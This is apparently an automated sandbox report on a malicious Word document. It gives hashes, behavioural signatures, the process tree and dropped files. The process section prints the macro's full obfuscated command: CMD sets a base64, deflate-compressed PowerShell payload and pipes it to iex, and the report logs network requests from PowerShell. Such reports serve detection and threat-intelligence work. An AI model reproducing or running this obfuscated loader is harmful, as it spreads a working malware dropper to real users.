Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
18-09-2024 07:53
Behavioral task
behavioral1
Sample
e8a69d43cb32354bd852c5ab9c071abe_JaffaCakes118.doc
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
e8a69d43cb32354bd852c5ab9c071abe_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
e8a69d43cb32354bd852c5ab9c071abe_JaffaCakes118.doc
-
Size
84KB
-
MD5
e8a69d43cb32354bd852c5ab9c071abe
-
SHA1
11c101fc170253637726e5d1117a86dd2a2d9401
-
SHA256
51cd6bdb18da6dc94549e067b04e727b9e947f2f189f5c27da67eb56f77c5f54
-
SHA512
796c5403741abeacc76247f52a872d2b11aba408493a16263a10a99d9fff9111c8a9610dfbd9ece011dc60bd922a453259487d60bbf0e2a0f2f9b45ed08d2900
-
SSDEEP
1536:c5ocn1kp59gxBK85fBt+a9AgIsTy4Ceh:B41k/W48jIt4CW
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 456 4752 CMD.exe 83 -
Blocklisted process makes network request 6 IoCs
flow pid Process 23 1992 powershell.exe 29 1992 powershell.exe 31 1992 powershell.exe 34 1992 powershell.exe 40 1992 powershell.exe 41 1992 powershell.exe -
pid Process 1992 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 4752 WINWORD.EXE 4752 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1992 powershell.exe 1992 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1992 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 4752 WINWORD.EXE 4752 WINWORD.EXE 4752 WINWORD.EXE 4752 WINWORD.EXE 4752 WINWORD.EXE 4752 WINWORD.EXE 4752 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 4752 wrote to memory of 456 4752 WINWORD.EXE 86 PID 4752 wrote to memory of 456 4752 WINWORD.EXE 86 PID 456 wrote to memory of 1992 456 CMD.exe 88 PID 456 wrote to memory of 1992 456 CMD.exe 88
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e8a69d43cb32354bd852c5ab9c071abe_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4752 -
C:\Windows\SYSTEM32\CMD.exeCMD c:\wINdows\SYsTeM32\CmD.EXe /C "SeT OxnHJ= ^& ((GV '*MDr*').nAme[3,11,2]-joiN'') ( NEW-oBjEcT Io.sTReaMReadeR((NEW-oBjEcT Io.cOMPresSIon.dEFLaTESTreAm([iO.mEmoRYSTREam] [syStEm.conVeRt]::FroMBasE64StriNG( 'TZDBSsNAEIZfJYeFbYnZ1ApGugSKitCDFqzoxctmO+2m3czGzdBNW/LupkHF6/8N38z8bLeqcoSQuGIHmqIXIPEBxYMtAUmy3drm3BDVszQlCy15qEBoV6XON8vjaf7DDgoNeA8BtgZQFJAuflEIQWhVAZaNNknjNhSU7x0mPaJ9+zM0Zjq5zvpYoYZqT8OS9+0k+++hE+B0IKFOtEPqj0zv2lcuVrUtacTnfCyZL5+jPOLZzS2X7Gt5nzPAw4ygqmP+yeMLj7mAFrjcOA9KmxFDr6MSo8vD4zP545n1xYhHF9A6tX4qLQwzV9FFOJYLPLg9JIteOiSy6D172WlF2py77hs=' ),[Io.CoMpResSioN.ComPreSSIONMoDE]::DECompreSs)),[sYsTeM.tEXT.encODiNG]::ascii) ).rEADtoeNd( ) &&PoWeRSHElL sET-IteM vAriAbLe:j1R9x ( [Type](\"{0}{1}{3}{2}\"-F 'EN','viR','ENt','ONM' )) ; ( ( geT-VaRIABlE J1r9X ).vAlUE::( \"{0}{5}{2}{3}{6}{4}{1}\" -f 'get','abLE','i','RONm','tVari','ENv','EN' ).Invoke( ( \"{1}{0}\" -f 'xnhJ','O' ),( \"{0}{1}\"-f 'Pr','oCEss') ) ) ^| ^& ( ${sH`eLl`Id}[1] + ${shE`L`LId}[13]+ 'x' )"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:456 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePoWeRSHElL sET-IteM vAriAbLe:j1R9x ( [Type](\"{0}{1}{3}{2}\"-F 'EN','viR','ENt','ONM' )) ; ( ( geT-VaRIABlE J1r9X ).vAlUE::( \"{0}{5}{2}{3}{6}{4}{1}\" -f 'get','abLE','i','RONm','tVari','ENv','EN' ).Invoke( ( \"{1}{0}\" -f 'xnhJ','O' ),( \"{0}{1}\"-f 'Pr','oCEss') ) ) | & ( ${sH`eLl`Id}[1] + ${shE`L`LId}[13]+ 'x' )3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1992
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
114B
MD5e89f75f918dbdcee28604d4e09dd71d7
SHA1f9d9055e9878723a12063b47d4a1a5f58c3eb1e9
SHA2566dc9c7fc93bb488bb0520a6c780a8d3c0fb5486a4711aca49b4c53fac7393023
SHA5128df0ab2e3679b64a6174deff4259ae5680f88e3ae307e0ea2dfff88ec4ba14f3477c9fe3a5aa5da3a8e857601170a5108ed75f6d6975958ac7a314e4a336aed0
-
Filesize
3KB
MD5fd49f81a6be3c0bd0890c039ae326d3a
SHA1123b419063208eff02499f63e5bf69bb292ca916
SHA256d9cca1f9d306e1985bda2987ce5adc11ad8c898c8ac9c8ba9d39af21c9fb4f45
SHA512d7b8fe2d8214659779445654e48e7422c710f73fb3d333032b34d2e5ddff5c7157e926b4803646aea54c3d780310315961dd6bf647649e7361581dab0de46d6c
-
Filesize
245KB
MD5f883b260a8d67082ea895c14bf56dd56
SHA17954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize2KB
MD501a15c7044dcd919150320c107365be5
SHA1ff4ac0c6f20817b746ebada7b29de3d94aead621
SHA25646f71988bb125d57b09f316897485a32e916458a717378909f3328f5249c72da
SHA512e7ca6ef349c972c2dd3d6429dcd7386a63b4ba3e7832a03c4b6387f258012afc2a8f1b4021eb77888104718655dc50a400f579b9c5d33d26ca7bf57a4a2f202a